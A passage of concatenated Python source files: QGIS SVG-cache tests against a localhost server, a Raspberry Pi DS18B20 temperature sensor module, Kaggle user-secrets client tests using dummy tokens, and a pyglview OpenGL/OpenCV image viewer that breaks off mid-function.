rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
test_qgssvgcache.py
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsSvgCache.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = '(C) 2018 by Nyall Dawson'
__date__ = '29/03/2018'
__copyright__ = 'Copyright 2018, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183'
import qgis # NOQA
import os
import socketserver
import threading
import http.server
from qgis.PyQt.QtCore import QDir, QCoreApplication
from qgis.PyQt.QtGui import QColor, QImage, QPainter
from qgis.core import (QgsSvgCache, QgsRenderChecker, QgsApplication, QgsMultiRenderChecker)
from qgis.testing import start_app, unittest
from utilities import unitTestDataPath
start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestQgsSvgCache(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Bring up a simple HTTP server, for remote SVG tests
os.chdir(unitTestDataPath())
handler = http.server.SimpleHTTPRequestHandler
cls.httpd = socketserver.TCPServer(('localhost', 0), handler)
cls.port = cls.httpd.server_address[1]
cls.httpd_thread = threading.Thread(target=cls.httpd.serve_forever)
cls.httpd_thread.setDaemon(True)
cls.httpd_thread.start()
def setUp(self):
self.report = "<h1>Python QgsSvgCache Tests</h1>\n"
self.fetched = True
QgsApplication.svgCache().remoteSvgFetched.connect(self.svgFetched)
def tearDown(self):
report_file_path = "%s/qgistest.html" % QDir.tempPath()
with open(report_file_path, 'a') as report_file:
report_file.write(self.report)
def svgFetched(self):
self.fetched = True
def waitForFetch(self):
self.fetched = False
while not self.fetched:
QCoreApplication.processEvents()
def testRemoteSVG(self):
"""Test fetching remote svg."""
url = 'http://localhost:{}/qgis_local_server/sample_svg.svg'.format(str(TestQgsSvgCache.port))
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
# first should be waiting image
self.assertTrue(self.imageCheck('Remote SVG', 'waiting_svg', image))
self.waitForFetch()
# second should be correct image
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
self.assertTrue(self.imageCheck('Remote SVG', 'remote_svg', image))
def testRemoteSvgAsText(self):
"""Test fetching remote svg with text mime format - e.g. github raw svgs"""
url = 'http://localhost:{}/qgis_local_server/svg_as_text.txt'.format(str(TestQgsSvgCache.port))
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
# first should be waiting image
self.assertTrue(self.imageCheck('Remote SVG as Text', 'waiting_svg', image))
self.waitForFetch()
# second should be correct image
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
self.assertTrue(self.imageCheck('Remote SVG as Text', 'remote_svg', image))
def testRemoteSvgBadMime(self):
"""Test fetching remote svg with bad mime type"""
url = 'http://localhost:{}/qgis_local_server/logo.png'.format(str(TestQgsSvgCache.port))
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
# first should be waiting image
self.assertTrue(self.imageCheck('Remote SVG bad MIME type', 'waiting_svg', image))
# second should be correct image
self.waitForFetch()
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
self.assertTrue(self.imageCheck('Remote SVG bad MIME type', 'bad_svg', image))
def testRemoteSvgMissing(self):
"""Test fetching remote svg with bad url"""
url = 'http://localhost:{}/qgis_local_server/xxx.svg'.format(str(TestQgsSvgCache.port)) # oooo naughty
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
self.assertTrue(self.imageCheck('Remote SVG missing', 'waiting_svg', image))
def imageCheck(self, name, reference_image, image):
self.report += "<h2>Render {}</h2>\n".format(name)
temp_dir = QDir.tempPath() + '/'
file_name = temp_dir + 'svg_' + name + ".png"
output_image = QImage(image.size(), QImage.Format_RGB32)
QgsMultiRenderChecker.drawBackground(output_image)
painter = QPainter(output_image)
painter.drawImage(0, 0, image)
painter.end()
output_image.save(file_name, "PNG")
checker = QgsRenderChecker()
checker.setControlPathPrefix("svg_cache")
checker.setControlName("expected_" + reference_image)
checker.setRenderedImage(file_name)
checker.setColorTolerance(2)
result = checker.compareImages(name, 20)
self.report += checker.report()
print(self.report)
return result
if __name__ == '__main__':
unittest.main()
|
ds18b20.py
|
# -*- coding: utf-8 -*-
"""
Main module for DS18B20 sensors.
"""
import os
import time
import sys
import logging
import exports
import collections
from threading import Thread, Lock, Event
"""
Private classes / functions
"""
class _SensorDictionary(object):
def __init__(self, sensors):
"""Private class *_SensorDictionary* provides functions to manage the
sensors dictionary.
:param sensors:
Expects a list containing sensors as strings.
:return:
Returns an in-memory object tree providing the functions
*set_temp*, *get_dic* and *reset_dic*.
"""
dic = dict()
for sensor in sensors:
dic[sensor] = None
self.dic = collections.OrderedDict(sorted(dic.items()))
self.lock = Lock()
def set_temp(self, sensor, temp):
"""Public function *set_temp* sets the value for an individual key.
:param sensor:
Expects a string of the sensor name to match with the sensor key.
:param temp:
Expects an integer or a float containing the sensor value
to store.
:return:
Returns *None*.
"""
with self.lock:
self.dic.__setitem__(sensor, temp)
def get_dic(self):
"""Public function *get_dic* returns the sensors dictionary.
:return:
Returns the dictionary.
"""
return self.dic
def reset_dic(self):
"""Public function *reset_dic* sets all dictionary values to None.
:return:
Returns *None*.
"""
for sensor in self.dic.keys():
self.dic.__setitem__(sensor, None)
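# Illustrative usage of _SensorDictionary (sensor IDs are made up):
#   sd = _SensorDictionary(['28-000004d9b5f2', '28-000004d9c3a1'])
#   sd.set_temp('28-000004d9b5f2', 21.5)
#   sd.get_dic()    # OrderedDict: 21.5 for the first sensor, None for the second
#   sd.reset_dic()  # all values back to None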
"""
Public classes / functions
"""
class Check(object):
def __init__(self, logger=None):
"""Public class *Check* provides functions to validate system
configuration enabling DS18B20 sensors.
:param logger:
Expects a logger object of the standard library module *logging*.
If *logger=None*, an own logger object of the standard
library module *logging* is added to handle outputs.
:return:
Returns an object providing the public functions *w1_config* and
*w1_modules*.
"""
# validating the passed parameter *logger*
if logger is None:
log_format = '%(asctime)s %(name)-8s %(levelname)-8s %(message)s'
log_date_format = '%Y-%m-%d %H:%M:%S'
logging.basicConfig(level=logging.INFO,
format=log_format,
datefmt=log_date_format)
self.logger = logging.getLogger('eems')
else:
self.logger = logger
self.dir_modules = '/etc/modules'
self.dir_config = '/boot/config.txt'
self.flag = {'w1-therm': False,
'w1-gpio': False}
def w1_config(self, quiet=None):
"""Public function *w1_config* checks the config.txt file for the
entry *dtoverlay=w1-gpio*.
:param quiet:
Expects the boolean *True* or *None*. If *quiet=True*, all outputs
of the function *w1_config* are disabled.
:return:
Returns *True* if check passed. Otherwise *False*.
"""
if quiet is True:
self.logger.disabled = True
try:
with open(self.dir_config, 'r') as config_file:
config = config_file.readlines()
except IOError as e:
self.logger.error('{}'.format(e))
else:
check = [c for c in config if c.strip('\n')[:17] ==
'dtoverlay=w1-gpio']
if len(check) == 0:
self.logger.error('Config.txt check failed: "dtoverlay=w1-gpio"'
' is not set')
self.logger.info('Please use the command script <sudo eems '
'prepare> to prepare "/boot/config.txt"')
return False
else:
self.logger.info('Config.txt check ok: "dtoverlay=w1-gpio" '
'is set')
return True
def w1_modules(self, quiet=None):
"""Public function *w1_modules* checks the file */etc/modules* for the
entries *w1-therm* and *w1-gpio*.
:param quiet:
Expects the boolean *True* or *None*. If *quiet=True*, all outputs
of the function *w1_modules* are disabled.
:return:
Returns *True* if check passed. Otherwise returns *False*.
"""
if quiet is True:
self.logger.disabled = True
try:
with open(self.dir_modules, 'r') as modules_file:
modules = modules_file.readlines()
except IOError as e:
self.logger.error('{}'.format(e))
else:
check_therm = [c for c in modules if c.strip('\n') == 'w1-therm']
check_gpio = [c for c in modules if c.strip('\n') == 'w1-gpio']
if len(check_therm) == 1:
self.logger.info('Module check ok: "w1-therm" is set')
self.flag['w1-therm'] = True
else:
self.logger.error('Module check failed: "w1-therm" is not set')
if len(check_gpio) == 1:
self.logger.info('Module check ok: "w1-gpio" is set')
self.flag['w1-gpio'] = True
else:
self.logger.error('Module check failed: "w1-gpio" is not set')
if self.flag['w1-therm'] is True and self.flag['w1-gpio'] is True:
return True
else:
self.logger.info('Please use the command script <sudo eems '
'prepare> to prepare "/etc/modules"')
return False
def prepare(self):
"""Public function *prepare* modifies the files */boot/config.txt* and
*/etc/modules* to enable DS18B20 functionality. Function requires *sudo*
rights!!!
:return:
Returns *None*.
"""
if self.w1_config(quiet=True) is False:
self.logger.disabled = False
try:
with open(self.dir_config, 'a') as config_file:
config_file.write('dtoverlay=w1-gpio\n')
except IOError as e:
self.logger.error('{}'.format(e))
else:
self.logger.info('Config.txt has been prepared successfully')
else:
self.logger.disabled = False
if self.w1_modules(quiet=True) is False:
self.logger.disabled = False
try:
if self.flag['w1-therm'] is False:
with open(self.dir_modules, 'a') as modules_file:
modules_file.write('w1-therm\n')
if self.flag['w1-gpio'] is False:
with open(self.dir_modules, 'a') as modules_file:
modules_file.write('w1-gpio\n')
except IOError as e:
self.logger.error('{}'.format(e))
else:
self.logger.info('Modules have been prepared successfully')
else:
self.logger.disabled = False
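# Illustrative usage of Check (assumes a Raspberry Pi style setup with
# /boot/config.txt and /etc/modules present; prepare() needs root rights):
#   chk = Check()
#   if not (chk.w1_config() and chk.w1_modules()):
#       chk.prepare()  # appends "dtoverlay=w1-gpio" / "w1-therm" / "w1-gpio"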
class Temp(object):
def __init__(self, csv=None, log=None, console=None):
"""Public Class *Temp* detects connected DS18B20 one-wire sensors
and provides functions to read the sensors. This class uses the
standard library module *logging* for handling outputs.
:param csv:
Expects the boolean *True* or *None*. If *csv=True*, a csv file is
created in the same directory as this script. Afterwards all public
functions of this object append entries to the csv file when called.
:param log:
Expects the boolean *True* or *None*. If *log=True*, a .txt logfile
is created in the same directory as this script. Therefore, all
outputs of the *level=DEBUG* are written into the log file.
:param console:
Expects the boolean *True* or *None*. If *console=True*, outputs
of the *level=INFO* are passed to the console.
:return:
Returns an object providing the public functions *read* and
*monitor*.
"""
if os.path.basename(sys.argv[0])[-3:] == '.py':
self.filename_script = os.path.basename(sys.argv[0])[:-3]
else:
self.filename_script = 'eems'
self.str_date = time.strftime('%Y-%m-%d')
self.str_time = time.strftime('%H-%M-%S')
self.event = Event()
self.read_flag = Event()
self.flag = False
self.stop = False
log_format = '%(asctime)s %(name)-8s %(levelname)-8s %(message)s'
log_date_format = '%Y-%m-%d %H:%M:%S'
if log is True:
log_file = '{0}_{1}_{2}.txt'.format(self.str_date,
self.str_time,
self.filename_script)
logging.basicConfig(level=logging.DEBUG,
format=log_format,
datefmt=log_date_format,
filename=log_file)
if console is True:
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter(fmt=log_format,
datefmt=log_date_format)
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
self.logger = logging.getLogger('eems')
else:
self.logger = logging.getLogger('eems')
else:
logging.basicConfig(level=logging.INFO,
format=log_format,
datefmt=log_date_format)
if console is True:
self.logger = logging.getLogger('eems')
else:
self.logger = logging.getLogger('eems')
self.logger.disabled = True
if log is True:
self.logger.debug('Logfile has been created')
else:
self.logger.debug('No logfile has been created')
pid = os.getpid()
self.logger.debug('Process PID: {0}'.format(pid))
sensors = self.__detect_sensors()
        if not sensors:
sys.exit()
else:
self.sensor_dict = _SensorDictionary(sensors)
if csv is True:
csv_file = '{0}_{1}_{2}.csv'.format(self.str_date,
self.str_time,
self.filename_script)
dic = self.sensor_dict.get_dic()
self.CsvHandler = exports.CsvHandler(csv_file,
dic.keys(),
self.logger)
self.csv = True
else:
self.csv = None
def __detect_sensors(self):
"""Private function *__detect_sensors* detects all connected DS18B20
sensors.
:return:
If sensors are detected successfully, a list containing all
connected sensors is returned. Otherwise *None* is returned.
"""
dir_sensors = '/sys/bus/w1/devices'
if os.path.exists(dir_sensors):
list_sensors = [fn for fn in os.listdir(dir_sensors)
if fn.startswith('28')]
if len(list_sensors) != 0:
self.logger.info('Sensors detected: {0}'.format(
len(list_sensors)))
return list_sensors
else:
self.logger.error('No sensors detected')
else:
self.logger.error('Path "/sys/bus/w1/devices" does not exist')
def __read_slave(self, sensor):
"""Private function *__read_slave* reads the file *w1_slave* of a
connected DS18B20 sensor.
:param sensor:
Expects a string containing the name of a connected DS18B20 sensor.
:return:
Returns *None*.
"""
dir_file = '/sys/bus/w1/devices/' + sensor
for x in range(4):
try:
with open(dir_file + '/w1_slave', 'r') as slave:
file_content = slave.readlines()
except IOError as e:
self.logger.error('{}'.format(e))
else:
                if file_content[0].strip()[-3:] == 'YES':
                    # CRC check passed; the value after "t=" is in m°C.
                    value = file_content[1].strip()[29:]
                    t = round(float(value) / 1000, 2)
                    self.sensor_dict.set_temp(sensor, t)
                    self.logger.info('Sensor: {0} - read successful - '
                                     '{1}°C'.format(sensor, t))
                    break
                elif x == 3:
                    # Last retry also failed; record the sensor as unreadable.
                    self.logger.warning('Sensor: {0} - read failed '
                                        '(Wrong CRC?)'.format(sensor))
                    self.sensor_dict.set_temp(sensor, 'n/a')
                else:
                    time.sleep(0.2)
def __read_sensors(self):
"""Private function *__read_sensors* reads all connected DS18B20 sensors
by initializing parallel threads. Function waits until all sensors
are read.
:return:
Returns *None*.
"""
self.read_flag.clear()
threads = []
dic = self.sensor_dict.get_dic()
for sensor in dic.keys():
threads.append(Thread(target=self.__read_slave,
args=(sensor, )))
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
self.read_flag.set()
def read(self, *args, **kwargs):
"""Public function *read* reads all connected DS18B20 sensors once.
:return:
Returns a dictionary containing sensor names as keys and
sensor values as values.
"""
del args, kwargs
if self.csv is None:
self.sensor_dict.reset_dic()
self.__read_sensors()
return self.sensor_dict.get_dic()
else:
self.sensor_dict.reset_dic()
self.__read_sensors()
result = self.sensor_dict.get_dic()
self.CsvHandler.write(result.values())
return result
def monitor(self, interval=60, duration=None):
"""Public function *monitor* starts a thread to read connected
DS18B20 sensors within an interval over a duration.
:param interval:
Expects an integer containing the interval time in seconds. The
default interval is set to 60 seconds.
:param duration:
Expects an integer containing the duration time in seconds. If
*duration=None*, the duration is infinite and the thread needs to
be stopped manually by pressing Ctrl+C.
:return:
Returns *None*.
"""
if self.flag is False:
if interval < 2:
self.logger.error('Interval must be >= 2s')
sys.exit()
worker = Thread(target=self.__start_read, args=(interval,))
self.logger.debug('Thread monitor was added')
if duration is None:
pass
else:
if duration > interval:
watchdog = Thread(target=self.__watchdog,
args=(duration, interval))
watchdog.setDaemon(True)
self.logger.debug('Watchdog_one has started with a duration'
' of {0}s'.format(duration))
watchdog.start()
else:
self.logger.error('Duration must be longer than the '
'interval')
sys.exit()
worker.start()
self.flag = True
            self.logger.debug('Thread monitor has started with an '
                              'interval of {0}s'.format(interval))
try:
while self.stop is False:
time.sleep(0.25)
except KeyboardInterrupt:
self.read_flag.wait()
self.__stop(trigger='keyboard')
else:
self.logger.warning('Already one read thread is running, '
'start of a second thread was stopped')
def __watchdog(self, duration, interval):
"""Private function *__watchdog* handles stopping of the function
        *monitor* after a user-defined duration has elapsed.
:param duration:
Expects an integer containing the duration in seconds.
:param interval:
Expects an integer containing the interval in seconds.
:return:
Returns *None*.
"""
timestamp = int(time.time() / interval) * interval
timestamp += interval
t = timestamp - time.time()
time.sleep(duration + t)
self.read_flag.wait()
self.__stop(trigger='watchdog')
def __start_read(self, interval):
"""Private function *__start_read* manages the loop in which the
function *__read_sensors* is called.
:param interval:
Expects an integer containing the interval in seconds.
:return:
Returns *None*.
"""
timestamp = int(time.time() / interval) * interval
timestamp += interval
self.event.clear()
while not self.event.wait(max(0, timestamp - time.time())):
if self.csv is None:
self.sensor_dict.reset_dic()
self.__read_sensors()
else:
self.sensor_dict.reset_dic()
self.__read_sensors()
result = self.sensor_dict.get_dic()
self.CsvHandler.write(result.values())
timestamp += interval
def __stop(self, trigger):
"""Private function *__stop* stops the thread started by calling
        the function *monitor*.
:param trigger:
Expects a string. Either *watchdog* or *keyboard* to trigger
varying info messages.
:return:
Returns *None*.
"""
message = ''
if self.event.is_set() is False:
self.event.set()
if trigger == 'watchdog':
message = 'Monitor has been stopped due to expiring duration'
elif trigger == 'keyboard':
message = 'Monitor has been stopped manually by ' \
'pressing Ctrl-C'
self.logger.debug(message)
self.flag = False
self.stop = True
else:
self.logger.warning('No monitor function to stop ...')
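# Minimal usage sketch (kept as a comment so importing this module stays
# side-effect free); the import path below is an assumption and should be
# adjusted to wherever this file lives in your project:
#
#     from eems.sensors import Temp          # hypothetical import path
#
#     temp = Temp(csv=True, console=True)    # detect sensors, log to console
#     print(temp.read())                     # one-shot read: {sensor_id: °C}
#     temp.monitor(interval=10, duration=60) # read every 10 s for 60 s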
|
test_user_secrets.py
|
import json
import os
import threading
import unittest
from http.server import BaseHTTPRequestHandler, HTTPServer
from test.support import EnvironmentVarGuard
from urllib.parse import urlparse
from datetime import datetime, timedelta
import mock
from google.auth.exceptions import DefaultCredentialsError
from google.cloud import bigquery
from kaggle_secrets import (GcpTarget, UserSecretsClient,
NotFoundError, ValidationError)
from kaggle_web_client import (_KAGGLE_URL_BASE_ENV_VAR_NAME,
_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME,
CredentialError, BackendError)
_TEST_JWT = 'test-secrets-key'
class UserSecretsHTTPHandler(BaseHTTPRequestHandler):
def set_request(self):
raise NotImplementedError()
def get_response(self):
raise NotImplementedError()
def do_HEAD(s):
s.send_response(200)
def do_POST(s):
s.set_request()
s.send_response(200)
s.send_header("Content-type", "application/json")
s.end_headers()
s.wfile.write(json.dumps(s.get_response()).encode("utf-8"))
class TestUserSecrets(unittest.TestCase):
SERVER_ADDRESS = urlparse(os.getenv(_KAGGLE_URL_BASE_ENV_VAR_NAME, default="http://127.0.0.1:8001"))
def _test_client(self, client_func, expected_path, expected_body, secret=None, success=True):
_request = {}
class AccessTokenHandler(UserSecretsHTTPHandler):
def set_request(self):
_request['path'] = self.path
content_len = int(self.headers.get('Content-Length'))
_request['body'] = json.loads(self.rfile.read(content_len))
_request['headers'] = self.headers
def get_response(self):
if success:
return {'result': {'secret': secret, 'secretType': 'refreshToken', 'secretProvider': 'google', 'expiresInSeconds': 3600}, 'wasSuccessful': "true"}
else:
return {'wasSuccessful': "false", 'errors': ['No user secrets exist for kernel']}
env = EnvironmentVarGuard()
env.set(_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME, _TEST_JWT)
with env:
with HTTPServer((self.SERVER_ADDRESS.hostname, self.SERVER_ADDRESS.port), AccessTokenHandler) as httpd:
threading.Thread(target=httpd.serve_forever).start()
try:
client_func()
finally:
httpd.shutdown()
path, headers, body = _request['path'], _request['headers'], _request['body']
self.assertEqual(
path,
expected_path,
msg="Fake server did not receive the right request from the UserSecrets client.")
self.assertEqual(
body,
expected_body,
msg="Fake server did not receive the right body from the UserSecrets client.")
def test_no_token_fails(self):
env = EnvironmentVarGuard()
env.unset(_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME)
with env:
with self.assertRaises(CredentialError):
client = UserSecretsClient()
def test_get_secret_succeeds(self):
secret = '12345'
def call_get_secret():
client = UserSecretsClient()
secret_response = client.get_secret("secret_label")
self.assertEqual(secret_response, secret)
self._test_client(call_get_secret,
'/requests/GetUserSecretByLabelRequest', {'Label': "secret_label"},
secret=secret)
def test_get_secret_handles_unsuccessful(self):
def call_get_secret():
client = UserSecretsClient()
with self.assertRaises(BackendError):
secret_response = client.get_secret("secret_label")
self._test_client(call_get_secret,
'/requests/GetUserSecretByLabelRequest', {'Label': "secret_label"},
success=False)
def test_get_secret_validates_label(self):
env = EnvironmentVarGuard()
env.set(_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME, _TEST_JWT)
with env:
client = UserSecretsClient()
with self.assertRaises(ValidationError):
secret_response = client.get_secret("")
def test_get_gcloud_secret_succeeds(self):
secret = '{"client_id":"gcloud","type":"authorized_user"}'
def call_get_secret():
client = UserSecretsClient()
secret_response = client.get_gcloud_credential()
self.assertEqual(secret_response, secret)
self._test_client(call_get_secret,
'/requests/GetUserSecretByLabelRequest', {'Label': "__gcloud_sdk_auth__"},
secret=secret)
def test_get_gcloud_secret_handles_unsuccessful(self):
def call_get_secret():
client = UserSecretsClient()
with self.assertRaises(NotFoundError):
secret_response = client.get_gcloud_credential()
self._test_client(call_get_secret,
'/requests/GetUserSecretByLabelRequest', {'Label': "__gcloud_sdk_auth__"},
success=False)
@mock.patch('kaggle_secrets.datetime')
def test_get_access_token_succeeds(self, mock_dt):
secret = '12345'
now = datetime(1993, 4, 24)
mock_dt.utcnow = mock.Mock(return_value=now)
def call_get_bigquery_access_token():
client = UserSecretsClient()
secret_response = client.get_bigquery_access_token()
self.assertEqual(secret_response, (secret, now + timedelta(seconds=3600)))
def call_get_gcs_access_token():
client = UserSecretsClient()
secret_response = client._get_gcs_access_token()
self.assertEqual(secret_response, (secret, now + timedelta(seconds=3600)))
self._test_client(call_get_bigquery_access_token,
'/requests/GetUserSecretRequest', {'Target': GcpTarget.BIGQUERY.target},
secret=secret)
self._test_client(call_get_gcs_access_token,
'/requests/GetUserSecretRequest', {'Target': GcpTarget.GCS.target},
secret=secret)
def test_get_access_token_handles_unsuccessful(self):
def call_get_access_token():
client = UserSecretsClient()
with self.assertRaises(BackendError):
client.get_bigquery_access_token()
self._test_client(call_get_access_token,
'/requests/GetUserSecretRequest', {'Target': GcpTarget.BIGQUERY.target}, success=False)
|
pyglview.py
|
#!/usr/bin/env python3
import logging
import os
import signal
import sys
import threading
import time
import numpy as np
from easydict import EasyDict as edict
try:
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import OpenGL.GLUT
AVAILABLE_OPENGL = True
except Exception as e:
print(e)
print("Error: Does not exist OpenGL library")
print(" > sudo apt install -y libxmu-dev libxi-dev # install before GPU driver")
print(" > pip3 install PyOpenGL PyOpenGL-accelerate")
AVAILABLE_OPENGL = False
logger = logging.getLogger(__name__)
def to_bool(s):
return s in [1, 'True', 'TRUE', 'true', '1', 'yes', 'Yes', 'Y', 'y', 't']
def handler(signum, frame):
exit(0)
signal.signal(signal.SIGINT, handler)
config = edict()
config.viewer = edict({"window_name": "Screen", "vsync": False, "double_buffer": False, "rgba_buffer": False, "fullscreen": False, "window_x": 100, "window_y": 100, "window_width": 1280, "window_height": 720, "cpu": False})
def get_config():
    # config is an EasyDict, so iterate over its keys rather than calling
    # configparser's sections().
    return {section: dict(config[section]) for section in config}
class Viewer:
def init(self, kargs):
for k in kargs:
setattr(self, k, kargs[k])
def s_bool(s, k):
setattr(s, k, to_bool(getattr(s, k)))
def s_int(s, k):
setattr(s, k, int(getattr(s, k)))
s_bool(self, "vsync")
s_bool(self, "double_buffer")
s_bool(self, "rgba_buffer")
s_bool(self, "fullscreen")
s_int(self, "window_x")
s_int(self, "window_y")
s_int(self, "window_width")
s_int(self, "window_height")
s_bool(self, "cpu")
logger.debug(f"Window:{self.window_width}")
def __init__(self, **kargs):
global config
self.keyboard_listener = None
self.cnt = 0
self.tm = 0
self.cnt2 = 0
self.image_buffer = None
self.destructor_function = None
self.idle_function = None
self.previous_time = time.time()
cv = config.viewer
for k in cv:
setattr(self, k, cv[k])
self.init(kargs)
def set_window_name(self, name):
self.window_name = name
def set_image(self, img):
self.image_buffer = img
def set_loop(self, func):
self.idle_function = func
def set_destructor(self, func):
self.destructor_function = func
def enable_fullscreen(self):
self.fullscreen = True
def disable_fullscreen(self):
        self.fullscreen = False
def enable_vsync(self):
if "darwin" in sys.platform:
return
try:
import ctypes
import ctypes.util
ogl = ctypes.cdll.LoadLibrary(ctypes.util.find_library("OpenGL"))
v = ctypes.c_int(1)
ogl.CGLGetCurrentContext.argtypes = []
ogl.CGLGetCurrentContext.restype = ctypes.c_void_p
ogl.CGLSetParameter.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_void_p]
ogl.CGLSetParameter.restype = ctypes.c_int
context = ogl.CGLGetCurrentContext()
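            # 222 is kCGLCPSwapInterval on macOS; setting it to 1 synchronises
            # buffer swaps with the display's vertical refresh.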
ogl.CGLSetParameter(context, 222, ctypes.pointer(v))
logger.debug("Enabled vsync")
except Exception as e:
logger.warning("Unable to set vsync mode, using driver defaults: {}".format(e))
def start(self, **kargs):
global AVAILABLE_OPENGL
self.init(kargs)
window_type = "offscreen"
if "linux" in sys.platform:
if 'DISPLAY' in os.environ:
logger.debug(f"DISPLAY: {os.environ['DISPLAY']}")
if os.environ['DISPLAY'] == ':0':
window_type = "primary"
else:
AVAILABLE_OPENGL = False
window_type = "virtual"
else:
AVAILABLE_OPENGL = False
else:
window_type = "primary"
logger.debug(f"WindowType: {window_type}")
logger.debug(f"Available OpenGL: {AVAILABLE_OPENGL}")
logger.debug(f"GPU: {self.cpu is False}")
if self.cpu is False and AVAILABLE_OPENGL:
logger.info("")
logger.info("---- Use GPU directly ----")
logger.info("")
args = []
logger.debug(f"VSync: {self.vsync}")
if self.vsync:
args.append('-sync')
self.enable_vsync()
logger.debug(f"ARGS: {args}")
w = self.window_width
h = self.window_height
x = self.window_x
y = self.window_y
glutInit(args)
DB = GLUT_SINGLE
CL = GLUT_RGB
if self.double_buffer:
DB = GLUT_DOUBLE
logger.debug("Use double buffer")
else:
logger.debug("Use single buffer")
if self.rgba_buffer:
CL = GLUT_RGBA
logger.debug("Use rgba buffer")
else:
logger.debug("Use rgb buffer")
glutInitDisplayMode(CL | DB | GLUT_DEPTH)
glutInitWindowSize(w, h)
glutInitWindowPosition(x, y)
glutCreateWindow(self.window_name)
if self.fullscreen: glutFullScreen()
glutDisplayFunc(self.__gl_draw)
glutIdleFunc(self.__gl_draw)
glutReshapeFunc(self.__gl_resize)
glutKeyboardFunc(self.__gl_keyboard)
glutSpecialFunc(self.__gl_keyboard)
glClearColor(0.0, 0.0, 0.0, 1.0)
glEnable(GL_DEPTH_TEST)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(-1, 1, -1, 1, -1, 1)
glutMainLoop()
else:
if window_type == "offscreen":
#import cv2
import imgcat
import queue
import multiprocessing
def iterm2_renderer(q):
while True:
img = q.get()
print("\033[0;0f")
imgcat.imgcat(img)
if True:
q = multiprocessing.Queue()
th = multiprocessing.Process(target=iterm2_renderer, args=(q, ), daemon=True)
th.start()
else:
q = queue.Queue()
th = threading.Thread(target=iterm2_renderer, args=(q, ))
th.setDaemon(True)
th.start()
logger.warning("@WARNING: No display.")
logger.warning("---- No display: iTerm2 renderer will be used ----")
while True:
if self.idle_function is not None:
try:
self.idle_function()
except Exception as e:
logger.error(e)
exit(9)
return
if self.image_buffer is not None:
try:
self.cnt += 1
#self.image_buffer = cv2.cvtColor(self.image_buffer,cv2.COLOR_BGR2RGB)
if time.time() - self.tm > 1.0:
#logger.info(f"\033[0KViewer[N/A]-FPS {self.cnt}\033[1A")
self.tm = time.time()
self.cnt = 0
if q.empty():
q.put(self.image_buffer)
#imgcat.imgcat(self.image_buffer)
time.sleep(0.008)
except Exception as e:
logger.error(e)
return
self.image_buffer = None
else:
time.sleep(0.008)
else:
import cv2
if self.cpu is False: logger.warning("@WARNING: GPU or physical display is not available.")
logger.warning("---- Use CPU(OpenCV) renderer ----")
buffer = np.zeros(shape=(self.window_height, self.window_width, 3), dtype=np.uint8)
if self.fullscreen:
cv2.namedWindow(self.window_name, cv2.WINDOW_NORMAL)
# cv2.namedWindow(self.window_name, cv2.WINDOW_OPENGL)
cv2.setWindowProperty(self.window_name, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
else:
cv2.namedWindow(self.window_name, cv2.WINDOW_AUTOSIZE | cv2.WINDOW_KEEPRATIO | cv2.WINDOW_GUI_NORMAL)
# cv2.namedWindow(self.window_name, cv2.WINDOW_NORMAL)
# pass
# cv2.namedWindow(self.window_name, cv2.WINDOW_GUI_NORMAL)
while True:
if self.idle_function is not None:
try:
self.idle_function()
except:
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return
if self.image_buffer is not None:
try:
self.cnt += 1
self.image_buffer = cv2.cvtColor(self.image_buffer, cv2.COLOR_BGR2RGB)
buffer.fill(0)
w = self.window_width
h = self.window_height
iw = self.image_buffer.shape[1]
ih = self.image_buffer.shape[0]
img = self.image_buffer
r = w / h
ir = iw / ih
ratio = 1.0
if r > ir:
ratio = h / ih
img = cv2.resize(img, (int(img.shape[1] * ratio), int(img.shape[0] * ratio)))
hlf = int((w - img.shape[1]) / 2)
buffer[0:img.shape[0], hlf:img.shape[1] + hlf, ] = img
else:
ratio = w / iw
img = cv2.resize(img, (int(img.shape[1] * ratio), int(img.shape[0] * ratio)))
hlf = int((h - img.shape[0]) / 2)
buffer[hlf:img.shape[0] + hlf, 0:img.shape[1], ] = img
if time.time() - self.tm > 1.0:
logger.info(f"\033[0KViewer[CV2]-FPS {self.cnt}\033[1A")
self.tm = time.time()
self.cnt = 0
if self.fullscreen:
